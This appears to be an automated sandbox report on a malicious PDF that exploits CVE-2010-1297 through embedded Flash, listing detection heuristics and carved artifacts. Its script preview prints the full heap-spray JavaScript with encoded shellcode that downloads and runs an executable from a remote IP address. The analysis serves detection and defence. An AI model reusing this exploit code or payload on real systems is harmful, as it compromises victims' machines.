MALICIOUS
264
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
The PDF contains embedded JavaScript that utilizes String.fromCharCode to decode shellcode. This shellcode is designed to exploit the CVE-2010-1297 vulnerability, which targets Adobe Flash Player within PDFs. The embedded SWF file and JavaScript stream are indicative of a malicious payload delivery mechanism.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 9
-
CVE-2010-1297 — Adobe Flash/Reader authplay heap-spray (Flash-in-PDF) critical CVE likely CVE_2010_1297PDF embeds a Flash (SWF) object via RichMedia and its JavaScript heap-sprays to groom memory for the embedded Flash exploit. This is the CVE-2010-1297 (authplay.dll) Flash-in-PDF memory-corruption shape; the spray is recovered after de-obfuscating space-padded %u, fromCharCode and \u builders that evade the raw heap-spray rules.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
var chars = String.fromCharCode(37008) + String.fromCharCode(37008);var code = chars + '\u42EB\uB95F\uFFFF\uFFFF\uFE89\uFFB0\uAEF2\u47FE\u89FF\uB0FB\uF2FF\uFEAE\uFF47\uFD89\uAEF2\u47FE\uEBFF\u6074\uC931\u8B64\u3071\u768B\u8B0C\u1C76\u5E8B\u8B08\u2056\u368B\u3966\u184A\uF275\u5C89\u1C24\uC361\u5EEB\u8B60\u246C\u8B24\u3C45\u548B\u7805\uEA01\u4A8B\u8B18\u205A\uEB01\u37E3\u8B49\u8B34\uEE01\uFF31\uC031\uACFC\uC084\u0A74\uCFC1\u010F\uE9C7\uFFF1\uFFFF\u7C3B\u2824\uDE75\u5A8B\u0124\u66EB\u0C8B\u8B4B\u1C … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
RichMedia (Flash) high PDF_RICHMEDIAPDF contains /RichMedia (Adobe Flash) which is a historic exploit vector
-
ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEXHex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.flashandmath.com In PDF document text
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In PDF document text
- http://adobe.com/AS3/2006/builtinIn PDF document text
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
20102884.swf |
pdf-embedded-file | PDF EmbeddedFile object 16 at offset 0x72B | 55839 bytes |
SHA-256: ce5f7936cf8e3536a88a804ce2d6902022df1794fa878bdc64a26866e34ba989 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
actual_type=SWF; declared_or_context_type=PDF; filename=20102884.swf; kind=pdf-embedded-file
|
|||
javascript_obj0006_000.js |
pdf-javascript-stream | PDF /JS object 6 at offset 0xF6 | 1440 bytes |
SHA-256: 5f7ef457edcc2cb155249c1fefb3d5a41a00c23204fa603f6ef9c916df8d0da6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var chars = String.fromCharCode(37008) + String.fromCharCode(37008);var code = chars + '\u42EB\uB95F\uFFFF\uFFFF\uFE89\uFFB0\uAEF2\u47FE\u89FF\uB0FB\uF2FF\uFEAE\uFF47\uFD89\uAEF2\u47FE\uEBFF\u6074\uC931\u8B64\u3071\u768B\u8B0C\u1C76\u5E8B\u8B08\u2056\u368B\u3966\u184A\uF275\u5C89\u1C24\uC361\u5EEB\u8B60\u246C\u8B24\u3C45\u548B\u7805\uEA01\u4A8B\u8B18\u205A\uEB01\u37E3\u8B49\u8B34\uEE01\uFF31\uC031\uACFC\uC084\u0A74\uCFC1\u010F\uE9C7\uFFF1\uFFFF\u7C3B\u2824\uDE75\u5A8B\u0124\u66EB\u0C8B\u8B4B\u1C5A\uEB01\u048B\u018B\u89E8\u2444\u611C\uEBC3\u315A\u52D2\u5352\u5255\uD0FF\u1AEB\u63EB\u78E8\uFFFF\uBAFF\u99F8\u3C3F\u5052\u8FE8\uFFFF\u31FF\u52D2\uD0FF\u33EB\u60E8\uFFFF\uBAFF\u1EE3\u1012\u5052\u77E8\uFFFF\u31FF\u81D2\uFFC2\uFFFF\u81FF\uFAEA\uFFFF\u52FF\uFF53\uEBD0\uBAC3\u9D33\u725E\u5052\u57E8\uFFFF\uEBFF\uEBA8\uE85A\uFF2B\uFFFF\u6CBA\u3C43\u5258\uE850\uFF42\uFFFF\uFF56\uEBD0\uE8DA\uFEF4\uFFFF\u7275\u6D6C\u6E6F\u642E\u6C6C\u75FF\u6470\u7461\u2E65\u7865\uFF65\u7468\u7074\u2F3A\u322F\u3731\u312E\u2E32\u3132\u2E35\u3631\u2F34\u4C42\u2F32\u642F\u6F72\u2E70\u6870\u3F70\u3D65\u6441\u626F\u2D65\u3032\u3031\u322D\u3838\uFF34\u03CD';var c = chars;while (c.length + 28 < 65536){ c+=c;}var v = c.substring(0, (0x0c0c-0x24)/2);v += code;v += c;var d = v.substring(0, 65536/2);while(1){ d += d; if(d.length >= 0x80000) break;}var t = d.substring(0, 0x80000 - (0x1020-0x08) / 2);var f = new Array();for (var i = 0; i < 0x1f0; i++){ f[i]=t+'s';}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.